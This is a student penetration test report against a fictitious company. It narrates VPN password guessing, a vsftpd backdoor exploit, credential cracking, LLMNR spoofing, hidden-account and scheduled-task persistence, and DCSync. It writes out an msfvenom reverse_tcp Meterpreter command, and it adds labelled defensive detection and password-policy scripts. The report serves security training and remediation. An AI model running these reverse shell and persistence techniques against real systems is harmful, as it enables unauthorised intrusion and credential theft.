MegaCorpOne Penetration Test Report
A penetration test of a fictitious company under the assumed name of a well-known security company (Mr. Robot ;)) as a project for my certificate program. (10/03/2022)
Introduction
In accordance with MegaCorpOne’s policies, Allsafe, LLC (henceforth known as AS) conducts external and internal penetration tests of its networks and systems throughout the year. The purpose of this engagement was to assess the networks’ and systems’ security and identify potential security flaws by utilizing industry-accepted testing methodology and best practices. The project was conducted on a number of systems on MegaCorpOne’s network segments by AS during October of 2022.
For the testing, AS focused on the following:
Attempting to determine what system-level vulnerabilities could be discovered and exploited with no prior knowledge of the environment or notification to administrators.
Attempting to exploit vulnerabilities found and access confidential information that may be stored on systems.
Documenting and reporting on all findings.
All tests took into consideration the actual business processes implemented by the systems and their potential threats; therefore, the results of this assessment reflect a realistic picture of the actual exposure levels to online hackers. This document contains the results of that assessment.
Assessment Objective
The primary goal of this assessment was to provide an analysis of security flaws present in MegaCorpOne’s web applications, networks, and systems. This assessment was conducted to identify exploitable vulnerabilities and provide actionable recommendations on how to remediate the vulnerabilities to provide a greater level of security for the environment.
AS used its proven vulnerability testing methodology to assess all relevant web applications, networks, and systems in scope.
MegaCorpOne has outlined the following objectives:
Objective
Find and exfiltrate any sensitive information within the domain.
Escalate privileges to domain administrator.
Compromise at least two machines.
Penetration Testing Methodology
Reconnaissance
AS begins assessments by checking for any passive (open source) data that may assist the assessors with their tasks. For internal assessments, the team will also perform active reconnaissance using tools such as Nmap and BloodHound.
Identification of Vulnerabilities and Services
AS uses custom, private, and public tools such as Metasploit, hashcat, and Nmap to gain perspective of the network security from a hacker’s point of view. These methods provide MegaCorpOne with an understanding of the risks that threaten its information, and also the strengths and weaknesses of the current controls protecting those systems. The results were achieved by mapping the network architecture, identifying hosts and services, enumerating network and system-level vulnerabilities, attempting to discover unexpected hosts within the environment, and eliminating false positives that might have arisen from scanning.
Vulnerability Exploitation
AS’s normal process is to both manually test each identified vulnerability and use automated tools to exploit these issues. Exploitation of a vulnerability is defined as any action we perform that gives us unauthorized access to the system or the sensitive data.
Reporting
Once exploitation is completed and the assessors have completed their objectives, or have done everything possible within the allotted time, the assessment team writes the report, which is the final deliverable to the customer.
Scope
Prior to any assessment activities, MegaCorpOne and the assessment team will identify targeted systems with a defined range or list of network IP addresses. The assessment team will work directly with the MegaCorpOne POC to determine which network ranges are in-scope for the scheduled assessment.
It is MegaCorpOne’s responsibility to ensure that IP addresses identified as in-scope are actually controlled by MegaCorpOne and are hosted in MegaCorpOne-owned facilities (i.e., are not hosted by an external organization). In-scope and excluded IP addresses and ranges are listed below.
IP Address/URL                                    Description
172.16.117.0/16, MCO.local, *.Megacorpone.com     MegaCorpOne internal domain, range and public website
Executive Summary of Findings
Grading Methodology
Each finding was classified according to its severity, reflecting the risk each such vulnerability may pose to the business processes implemented by the application, based on the following criteria:
Critical: Immediate threat to key business processes.
High: Indirect threat to key business processes/threat to secondary business processes.
Medium: Indirect or partial threat to business processes.
Low: No direct threat exists; vulnerability may be leveraged with other vulnerabilities.
Informational: No threat; however, it is data that may be used in a future attack.
As the following grid shows, each threat is assessed in terms of both its potential impact on the business and the likelihood of exploitation:
Summary of Strengths
While the assessment team was successful in finding several vulnerabilities, the team also recognized several strengths within MegaCorpOne’s environment. These positives highlight the effective countermeasures and defenses that successfully prevented, detected, or denied an attack technique or tactic from occurring.
Windows Account Lockout On
Only necessary ports on the Web Server are open (22, 80, 443)
Firewall rules only allowed outbound traffic on Port 53
Summary of Weaknesses
AS successfully found several critical vulnerabilities that should be immediately addressed in order to prevent an adversary from compromising the network. These findings are not specific to a software version but are more general and systemic vulnerabilities.
Weak VPN password credentials
Confidential PHP file discoverable through Google Dorking
One service on 172.22.117.150 was listening on Port 21 (Backdoor creation)
Admin Password and Credentials file on web server was not hidden and had an obvious name
User password complexity was very minimal and took little to no time to crack with John
Usernames and passwords were the same between separate machines which made lateral movement easier
An LLMNR request generated by ordinary user activity was spoofed to capture another username and password hash
System information was attainable through wmiexec command execution
Host-based firewall did not detect the script added to the root of the C:\ drive to maintain a reverse TCP shell connection (persistence)
Persistence through a Windows service was possible because the created service could be migrated to a hidden, SYSTEM-owned service account that was neither audited nor flagged by any IDS
The scheduled task list could be edited to add a persistent backdoor script
LSASS cache was able to be accessed remotely to reveal more credentials
Admin credentials utilized to move laterally to the Domain Controller (DC)
DC was able to be exploited to reveal more user credentials and their hashes
Executive Summary
Beginning the penetration test of MegaCorpOne’s network, following the specified scope and Rules of Engagement, I began with some OSINT techniques through Google Dorking. A search entry, “site:megacorpone.com,” produced a few valuable web pages including an Index of Assets that contained the web server the site was running (Apache version 2.4.38 on Debian OS). Further queries produced a list of employee names and email addresses that shed light on company email naming structure. After a few more refined searches, I was also able to locate a hidden file called “nanites.php” that contained sensitive company information (robots.txt was supposed to keep this from standard search engine discovery).
Following the Google Dorking section, I utilized the tool nslookup to discover the IP address of MegaCorpOne.com, and placed it as a search in the Shodan database. This led to a discovery of which Ports were open and ready for traffic (Ports 22, 80, 443). The version of SSH was found to be SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2, and the web server information discovered above held true. A potential vulnerability (CVE-2019-0215, CVE-2019-0220, CVE-2019-0217, CVE-2019-0197, CVE-2019-0196, CVE-2019-0211) was also listed, but not confirmed quite yet, and the web server itself was found to be located in Montreal, Canada.
Utilizing Recon-ng to gather some more information, I was able to create a report finding a list of hosts and IP addresses to utilize later in the test. There were a total of 18 hosts, and the IPs are listed in the screenshot of my report below:
After careful review of the Recon-ng report, I realized there was a host titled “vpn.megacorpone.com.” This site prompts a login to gain access to MegaCorpOne’s VPN, and the technique I used was password guessing. Utilizing usernames crafted from variants of employee email naming components (first initial last name), I began guessing common passwords in order to gain access to the VPN. The password combinations I discovered are as follows:
After a successful login utilizing thudson and thudson, I was able to download the script “vpn.sh” and execute it in my command line. This technique got me access to the internal VPN of MegaCorpOne.
Once access to the VPN was gained, I ran the command “ip addr” in order to discover what IP and subnet mask I was connected to, and the results for Ethernet interface 1 are as follows:
A Zenmap scan (nmap -T4 -A -v --script ftp-vsftpd-backdoor,smb-os-discovery,smb-system-info 172.22.117.0/24) provided the following information about open ports and a listed vulnerability involving a backdoor via Port 21:
Out of this grand list of open ports, there are a few exploits that are able to be run. Utilizing searchsploit, I tracked down a specific exploit involving utilization of a backdoor via the open Port 21. The targeted host will be the IP address: 172.22.117.150.
Upon execution of the 5th option above with the command “python /usr/share/exploitdb/exploits/remote/49757.py,” a shell connection was established and the following UID and GID were discovered:
This information allowed me to successfully gain access to the host 172.22.117.150. Another version scan utilizing Nmap (to draw less attention from IDS/IPS) provided further information that would eventually be used in the Metasploit Framework.
After this scan, a simple attempt at searching for an exploit throughout the MSFConsole led me to an exploit called distcc_exec. Combining this with a reverse shell payload, I was successfully able to gain access to the remote host 172.22.117.150.
After setting the Local Host to my IP address, I ran the exploit and was able to establish a low level reverse shell connection to the specified Remote Host.
Once inside of the remote host, I ran a series of find and grep commands in order to navigate and find sensitive information. This information would include keywords such as secret, passwords, admin, key, etc. I was able to find an important file path named “/var/tmp/adminpassword.txt.” These were the results of viewing that file’s contents:
The provided credentials offer two main venues of further exploitation: an SSH connection can be established because Port 22 is open, and the account is admin, which means higher privileged access and more files open to viewing and manipulation. The command to achieve this connection was a success with the discovered credentials. This account was also discovered to have root access by executing the command “sudo su.”
Following privilege escalation, I utilized the John the Ripper tool to crack any hashes I found in the “/etc/shadow” file. This list of hashes was cracked against the wordlist “rockyou.txt” to speed up the cracking process. The following list shows the cracked hashes and credentials found across all valid user accounts for this Web server:
I then established persistence on the web machine in order to have access at a later time if I require it or lose the connection, or even if a password change occurs for valid credentials. To do this, I first began by editing the “/etc/ssh/sshd_config” file by adding my own specified Port 10022. After changes were made, I rebooted the server and reconnected via SSH with the admin account found earlier. I required a hidden account as well, so I created “systemd-ssh” with my own password for access and no home directory specified. I then added my new account to the sudo group so I would have escalated privileges upon future logins.
After establishing persistence on the Web server, I now had access whenever I wanted to reconnect via my own port and hidden account. The company accounts were not finished yet, however. In the coming paragraphs and screenshots, I will be covering the ethical hacking process for the Windows Host.
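The persistence steps described above (an extra sshd Port directive, a new account with a system-style name and no home directory, and a new member of the sudo group) each leave an artifact in a file a defender can diff against a baseline. The following Python script is an added example, not part of the original report or of any tool it names: it reads those three files and reports every deviation from an assumed baseline. The sshd_config, passwd and group contents below are constructed samples, and the approved sudoers list is an assumption; in production, read the real /etc/ssh/sshd_config, /etc/passwd and /etc/group and leave the isdir argument at its default.

```python
"""Audit for the Linux persistence artifacts described above: an extra sshd
'Port' directive, an unexpected member of the sudo group, and a login-capable
account that imitates a system account and has no home directory on disk.

Added example; not part of the original report. The three files below are
constructed samples; in production read /etc/ssh/sshd_config, /etc/passwd
and /etc/group and leave the isdir argument at its default.
"""
import os

SSHD_CONFIG = """\
# constructed sample of /etc/ssh/sshd_config
Port 22
Port 10022
PermitRootLogin no
PasswordAuthentication yes
"""

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
admin:x:1000:1000:admin:/home/admin:/bin/bash
systemd-ssh:x:1002:1002::/home/systemd-ssh:/bin/bash
"""

GROUP = """\
root:x:0:
sudo:x:27:admin,systemd-ssh
"""

EXPECTED_SSH_PORTS = {22}
APPROVED_SUDOERS = {"admin"}         # assumed: the accounts allowed in group sudo
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}
SYSTEM_PREFIXES = ("systemd-", "_")  # naming styles genuine service accounts use


def sshd_ports(config: str) -> set[int]:
    """Collect every Port directive, ignoring comment lines and keyword case."""
    ports = set()
    for raw in config.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line.lower().startswith("port "):
            ports.add(int(line.split()[1]))
    return ports


def unexpected_sudoers(group_text: str, approved: set[str]) -> list[str]:
    """Members of group sudo that are not on the approved list."""
    for line in group_text.splitlines():
        name, _pw, _gid, members = line.split(":")
        if name == "sudo":
            return sorted({m for m in members.split(",") if m} - approved)
    return []


def suspicious_accounts(passwd_text: str, isdir=os.path.isdir) -> list[tuple[str, list[str]]]:
    """Login-capable accounts with a system-style name or a missing home directory."""
    flagged = []
    for line in passwd_text.splitlines():
        name, _pw, uid, _gid, _gecos, home, shell = line.split(":")
        if shell in NOLOGIN_SHELLS:
            continue  # genuine service accounts cannot log in
        reasons = []
        if int(uid) >= 1000 and name.startswith(SYSTEM_PREFIXES):
            reasons.append("system-style name with a login shell")
        if not isdir(home):
            reasons.append("home directory missing")
        if reasons:
            flagged.append((name, reasons))
    return flagged


def run_audit(config=SSHD_CONFIG, passwd=PASSWD, group=GROUP, isdir=os.path.isdir) -> dict:
    """Run all three checks and return the deviations from the baseline."""
    return {
        "unexpected_ssh_ports": sorted(sshd_ports(config) - EXPECTED_SSH_PORTS),
        "unexpected_sudoers": unexpected_sudoers(group, APPROVED_SUDOERS),
        "suspicious_accounts": suspicious_accounts(passwd, isdir),
    }


if __name__ == "__main__":
    # With the constructed samples, pretend only /root and /home/admin exist on disk.
    sample_dirs = {"/root", "/home/admin"}
    for check, result in run_audit(isdir=sample_dirs.__contains__).items():
        print(f"{check}: {result}")
```

Run it as a cron job and alert on any non-empty result; the checks are deliberately baseline comparisons rather than signatures, so they also catch a second sshd port or sudo member that uses a different name than the ones seen in this engagement.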
First I began the process by utilizing Nmap again to scan the network IP subnet range (172.22.117.0/24) to ensure I scanned every device over again. I performed this with a version scan as follows:
In order to tell these are Windows machines simply by the scan, I looked for common use Ports and services among Windows systems like Samba (445), RDP (3389), and Kerberos (88). Kerberos especially shows if a host is a Domain Controller or not, and if any of the logins I found earlier work, I can launch another exploit and gain access via one of these openings.
I returned to Metasploit and decided Samba would be the point of entry and exploitation. I went with the methodology of Password Spraying (as Windows systems have lockout from login group policies), and utilized the following attack and options with user tstark’s credentials:
This exploit resulted in success on two specific IP addresses, 172.22.117.10 and 172.22.117.20:
As it turns out, the credentials gained via the Debian based web server from earlier held true with the Windows machine.
After this, I launched an LLMNR Spoofing exploit to trick the system into giving up a potential login username and hash. The responder tool allowed me to retrieve the following hash and information:
Upon cracking the given hash with John again, the new set of credentials was found to be “pparker” and “Spring2021.”
Next I moved back to Metasploit to take advantage of some remote wmiexec commands. I used whoami, net session, net share, tasklist, and systeminfo to discover more about the IP address 172.22.117.20. The results are below:
For the next exploit, I created a payload using the tool msfvenom. The command entered would establish a meterpreter connection for access to the system via a shell. It read: msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.22.117.100 LPORT=4444 -f exe > shell.exe. The creation of this payload as a shell executable came in handy later when establishing persistence on the Windows Host. Using smbclient and tstark’s credentials, I was able to gain access to the remote machine.
Once connected, I was in the Windows “root” directory, so I added the shell.exe payload to the system to utilize later. Going back to the wmiexec exploit from earlier, I utilized this to execute my newly added shell.exe payload after setting up my own meterpreter shell listener (the two combined formed a reverse shell connection between my local host and the remote host).
After connecting via meterpreter reverse shell, I needed to establish persistence. To do this, I utilized persistence_service to create a randomly generated service on the Windows machine that I could connect to later. To better hide the service I reallocated it to a better named service that is under ownership of the “System” user, and then using meterpreter, I had a few more tasks to complete.
I established persistence by taking my shell script from earlier and adding it to the Windows list of scheduled tasks. This would allow my script to be executed at 00:00 every day under the radar so I always have a backdoor for a reverse shell connection.
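Both Windows persistence methods described above write to the event logs: a newly installed service produces System log event 7045 (A service was installed in the system) and a newly created scheduled task produces Security log event 4698 (A scheduled task was created, whose data includes the full task XML). The following Python script is an added example, not part of the original report or of Metasploit: it runs a trusted-directory rule over constructed event records shaped like those two events and flags a service binary or task command that lives outside the Windows and Program Files directories. The event fields, the random-looking service name, the task names and the trusted directory list are constructed assumptions to be tuned per environment.

```python
"""Detection over Windows event data for the two persistence methods used
on the Windows 10 host above: a service installed through the Meterpreter
persistence module (System log event 7045, 'A service was installed in the
system') and a scheduled task that runs a dropped executable (Security log
event 4698, 'A scheduled task was created').

Added example; not part of the original report or of Metasploit. The events
are constructed samples shaped like the real event fields, and the trusted
directory list is an assumption to be tuned per environment.
"""
import xml.etree.ElementTree as ET

TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"

# Directories from which services and scheduled tasks are expected to run.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Environment variables that appear in task definitions; expanded before matching.
ENV = {"%windir%": "c:\\windows", "%systemroot%": "c:\\windows",
       "%programfiles%": "c:\\program files"}


def task_xml(command: str, start: str) -> str:
    """Minimal task definition shaped like the TaskContent field of event 4698 (constructed)."""
    return (f'<Task xmlns="{TASK_NS}"><Triggers><CalendarTrigger>'
            f"<StartBoundary>{start}</StartBoundary><ScheduleByDay><DaysInterval>1"
            "</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>"
            f"<Actions><Exec><Command>{command}</Command></Exec></Actions></Task>")


SAMPLE_EVENTS = [  # constructed, not real log data
    {"event_id": 7045, "ServiceName": "Spooler",
     "ImagePath": "C:\\Windows\\System32\\spoolsv.exe", "AccountName": "LocalSystem"},
    {"event_id": 7045, "ServiceName": "jGkqTzWpLm",  # random-looking name (constructed)
     "ImagePath": "C:\\Users\\tstark\\AppData\\Local\\Temp\\svc.exe", "AccountName": "LocalSystem"},
    {"event_id": 4698, "SubjectUserName": "SYSTEM",
     "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "TaskContent": task_xml("%windir%\\system32\\defrag.exe", "2022-10-01T03:00:00")},
    {"event_id": 4698, "SubjectUserName": "tstark", "TaskName": "\\Updater",
     "TaskContent": task_xml("C:\\shell.exe", "2022-10-03T00:00:00")},
]


def executable_of(image_path: str) -> str:
    """Strip arguments from a service ImagePath: '"C:\\a b\\c.exe" -k net' -> 'C:\\a b\\c.exe'."""
    s = image_path.strip()
    if s.startswith('"'):
        return s[1:s.find('"', 1)]
    return s.split(" ", 1)[0]


def is_trusted_path(path: str) -> bool:
    """True when the (lower-cased, env-expanded) path starts with a trusted directory."""
    p = path.strip().strip('"').lower()
    for var, value in ENV.items():
        p = p.replace(var, value)
    return p.startswith(TRUSTED_DIRS)


def task_commands(task_content: str) -> list[str]:
    """Every <Exec><Command> in a task definition, regardless of namespace prefix."""
    root = ET.fromstring(task_content)
    return [(el.text or "").strip() for el in root.iter() if el.tag.split("}")[-1] == "Command"]


def analyze(events: list[dict]) -> list[tuple[int, str, str, str]]:
    """Return (event_id, name, binary, reason) for each event the rules flag."""
    alerts = []
    for ev in events:
        if ev["event_id"] == 7045:
            exe = executable_of(ev["ImagePath"])
            if not is_trusted_path(exe):
                alerts.append((7045, ev["ServiceName"], exe,
                               "new service binary outside trusted directories"))
        elif ev["event_id"] == 4698:
            for cmd in task_commands(ev["TaskContent"]):
                if not is_trusted_path(cmd):
                    alerts.append((4698, ev["TaskName"], cmd,
                                   "new scheduled task runs binary outside trusted directories"))
    return alerts


if __name__ == "__main__":
    for event_id, name, binary, reason in analyze(SAMPLE_EVENTS):
        print(f"event {event_id}: {name} -> {binary}: {reason}")
```

Event 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled in the advanced audit policy, so the rule is silent on hosts where that policy is off; event 7045 is logged by the Service Control Manager without any policy change.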
Following the creation of persistence, I went forward with obtaining more secure credentials by accessing the LSA Dump Cache and cracking the available hashes with John again. I was able to obtain the following credentials:
I utilized bbanner’s login and another Metasploit tool to test other hosts and see if the credentials would be valid for the Domain Controller (DC). Once verified, it was time to move laterally from the compromised Windows 10 system to the Windows DC. I utilized another Metasploit tool from an open Meterpreter session and established a SYSTEM level login with the DC.
Lastly, I made sure to obtain even more credentials once inside the DC. I used a tool called DCSync to obtain more user hashes and used John to crack those as well. Their cracked passwords per username are listed below:
Summary Vulnerability Overview
Vulnerability                                            Severity
Weak password on public web application                  Critical
Confidential file visible to public via Google Dorking   Medium
Port 21 Open on Web Server service                       Critical
Admin Credentials were too easy to find in filesystem    Critical
Admin Credentials to Domain Controller too Weak          Critical
The following summary tables represent an overview of the assessment findings for this penetration test:
Scan Type   Total
Hosts       172.22.117.0/24
Ports       All open (21, 22, 80, 443, 53)

Exploitation Risk   Total
Critical            4
High                0
Medium              1
Low                 0
Vulnerability Findings
Weak Password on Public Web Application
Risk Rating: Critical
Description:
The site vpn.megacorpone.com is used to host the Cisco AnyConnect configuration file for MegaCorpOne. This site is secured with basic authentication but is susceptible to a dictionary attack. AS was able to use a username gathered from OSINT in combination with a wordlist in order to guess the user’s password and access the configuration file.
Affected Hosts: vpn.megacorpone.com
Remediation:
Set up two-factor authentication instead of basic authentication to prevent dictionary attacks from being successful.
Require strong password complexity: passwords longer than 12 characters that contain both upper- and lowercase letters and include at least one special character.
Reset the user thudson’s password.
Confidential File Visible to Public via Google Dorking
Risk Rating: Medium
Description:
After utilizing Google Dorking methods, AS was able to discover a path disallowed in the site’s “robots.txt” file. This file was then retrieved and revealed internal company information regarding the measured nanite levels.
Affected Hosts: megacorpone.com
Remediation:
Store this information in a more protected (or deeper-layered) database that is not exposed on the public-facing web front end.
Utilize a diversified web server design which houses sensitive company data on another server to increase redundancy and security of data.
Encrypt the sensitive information so that it is not written in plaintext to eliminate human readable exposure of sensitive data.
Port 21 Open on Web Server
Risk Rating: Critical
Description:
The web server (IPv4: 172.22.117.150) runs a service that leaves Port 21 (FTP) open. AS discovered this in multiple network scans and exploited it in an attempt to gain access. FTP is an insecure legacy protocol that can be used to transfer payloads to a target machine, so AS was able to exploit this service and gain access to the web server.
Affected Hosts: megacorpone.com (172.22.117.150)
Remediation:
Carefully vet services and check required service configurations before installing them on a web server.
Perform frequent network scans to audit the currently configured settings, and monitor logs, in order to keep ports closed that do not need to be open.
Configure further firewall rules to block traffic via Port 21 and ensure security of the web server, even if services’ Port configurations cannot be changed.
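The audit the second remediation item calls for can be automated against the scanner’s own output. The following Python script is an added example, not part of the original report or of Nmap: it parses the “Ports:” field of Nmap grepable (-oG) output and reports every open port that is not on a per-host allowlist. The scan lines are constructed for illustration (they are not the assessment’s real scan data), and the allowlists are assumptions; the web server’s allowlist of 22, 80 and 443 follows the Summary of Strengths above.

```python
"""Expected-port audit over nmap grepable (-oG) output.

Added example, not part of the original report. Parses the 'Ports:' field
that nmap writes for each host and reports any open port that is not on
the per-host allowlist. Scan lines and allowlists below are constructed
for illustration; the web server's allowlist follows the report's
Summary of Strengths (only 22, 80 and 443 should be open).
"""

# Constructed sample of `nmap -sV -oG - 172.22.117.0/24` output (not real scan data).
SAMPLE_SCAN = (
    "# Nmap scan (constructed sample)\n"
    "Host: 172.22.117.150 ()\tStatus: Up\n"
    "Host: 172.22.117.150 ()\tPorts: 21/open/tcp//ftp///, "
    "22/open/tcp//ssh//OpenSSH 7.9p1 Debian 10+deb10u2/, "
    "80/open/tcp//http//Apache httpd 2.4.38/, "
    "443/open/tcp//ssl|http//Apache httpd 2.4.38/\tIgnored State: closed (996)\n"
    "Host: 172.22.117.20 ()\tPorts: 135/open/tcp//msrpc///, "
    "445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///"
    "\tIgnored State: filtered (997)\n"
)

# Ports each host is allowed to expose (assumed baseline for this example).
ALLOWLIST = {
    "172.22.117.150": {22, 80, 443},  # web server, per Summary of Strengths
    "172.22.117.20": {445, 3389},     # Windows 10 workstation
}


def parse_open_ports(grepable: str) -> dict[str, dict[int, str]]:
    """Return {host_ip: {port: service}} for every port nmap reports as open."""
    hosts: dict[str, dict[int, str]] = {}
    for line in grepable.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines and blank lines
        # Tab-separated "Key: value" fields: Host, Status, Ports, Ignored State, ...
        fields = dict(f.split(":", 1) for f in line.split("\t") if ":" in f)
        ip = fields["Host"].split()[0]
        for entry in fields.get("Ports", "").split(","):
            entry = entry.strip()
            if not entry:
                continue
            # Each entry is port/state/protocol/owner/service/rpc/version/
            parts = entry.split("/")
            port, state, service = int(parts[0]), parts[1], parts[4]
            if state == "open":
                hosts.setdefault(ip, {})[port] = service or "unknown"
    return hosts


def unexpected_ports(hosts: dict[str, dict[int, str]], allowlist: dict[str, set[int]]):
    """List (ip, port, service) for open ports missing from the host's allowlist."""
    findings = []
    for ip, ports in sorted(hosts.items()):
        expected = allowlist.get(ip, set())  # unknown host: nothing is expected
        for port in sorted(ports):
            if port not in expected:
                findings.append((ip, port, ports[port]))
    return findings


if __name__ == "__main__":
    for ip, port, service in unexpected_ports(parse_open_ports(SAMPLE_SCAN), ALLOWLIST):
        print(f"{ip}: port {port} ({service}) is open but not on the allowlist")
```

A host that is absent from the allowlist is treated as having no expected ports, so an unexpected device that appears in the scanned range is reported in full rather than silently accepted.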
Admin Credentials Easily Located in Obvious File
Risk Rating: Critical
Description:
Once AS gained access to the web server, Linux search commands were used to comb the filesystem for keywords such as secret, password, or admin. This led to the discovery of an unprotected file that held the msfadmin login and password in plaintext. These credentials were then used to gain authenticated SSH access to the web server and further exploit the machine.
Affected Hosts: megacorpone.com (172.22.117.150)
Remediation:
Maintain proper security of admin credentials and do NOT store them on the actual web server.
Obfuscate file names so they are not so easily discovered with a “find” command initiated from the root directory.
Encrypt the file itself so that the credentials are not written in plaintext.
Change credentials frequently so there are more chances of eliminating prolonged access to a server.
Admin Credentials to Domain Controller too Weak
Risk Rating: Critical
Description:
After access was obtained on both the Linux web server and the discovered Windows 10 machine, AS used the discovered credentials to move laterally to the Windows Domain Controller (DC). All discovered passwords for user accounts, especially admin accounts, were very simple and could be brute-forced with a variety of tools including John the Ripper. This lateral movement was easy to execute because of the large number of weak passwords.
Affected Hosts: megacorpone.com (172.22.117.10, 172.22.117.20)
Remediation:
Establish two-factor authentication to ensure logins are protected with one extra level of security.
Increase password strength requirements: a longer minimum character count, required special characters, and a combination of upper- and lowercase letters.
Renew passwords every 3 months to keep prolonged access to a minimum.
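Findings 1 and 5 both call for a stronger password policy. The following Python script is an added example, not part of the original report: it encodes the stated policy (more than 12 characters, upper- and lowercase letters, a special character) as a checker that a password-reset or account-provisioning workflow could call, and, as an extension motivated by the cracked pairs reported above, also rejects passwords that contain the username or follow a Season+Year pattern. The 13-character minimum, the season list and the sample pairs are assumptions.

```python
"""Password policy check for the remediation items in findings 1 and 5.

Added example; not part of the original report. The policy encodes the
report's stated requirements (more than 12 characters, upper- and lowercase
letters, a special character) and adds two checks motivated by the results:
the password must not contain the username (thudson/thudson) and must not
follow the Season+Year pattern (Spring2021) that fell to rockyou.txt
immediately. The minimum length and season list are assumptions.
"""
import re
import string

MIN_LENGTH = 13  # "over 12 characters" means at least 13
SEASON_YEAR = re.compile(r"^(spring|summer|fall|autumn|winter)\d{2,4}[^a-z0-9]?$",
                         re.IGNORECASE)


def check_password(password: str, username: str = "") -> list[str]:
    """Return the list of policy violations; an empty list means the password passes."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if not any(c.isupper() for c in password):
        problems.append("no uppercase letter")
    if not any(c.islower() for c in password):
        problems.append("no lowercase letter")
    if not any(c in string.punctuation for c in password):
        problems.append("no special character")
    if username and username.lower() in password.lower():
        problems.append("contains the username")
    if SEASON_YEAR.match(password):
        problems.append("season+year pattern")
    return problems


def audit(credentials) -> dict[str, list[str]]:
    """Apply the policy to (username, password) pairs, e.g. during a forced reset."""
    return {user: check_password(pw, user) for user, pw in credentials}


if __name__ == "__main__":
    # The pairs the report recovered, plus one that satisfies the policy (constructed).
    for user, problems in audit([("thudson", "thudson"), ("pparker", "Spring2021"),
                                 ("example", "Correct-Horse-Battery9!")]).items():
        print(f"{user}: {'OK' if not problems else ', '.join(problems)}")
```

The username and Season+Year checks are the cheap part of a denylist; a production deployment would add a check against a breached-password corpus, since a password that meets every complexity rule can still appear in a wordlist such as rockyou.txt.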
MITRE ATT&CK Navigator Map
The following completed MITRE ATT&CK navigator map shows all of the techniques and tactics that AS used throughout the assessment.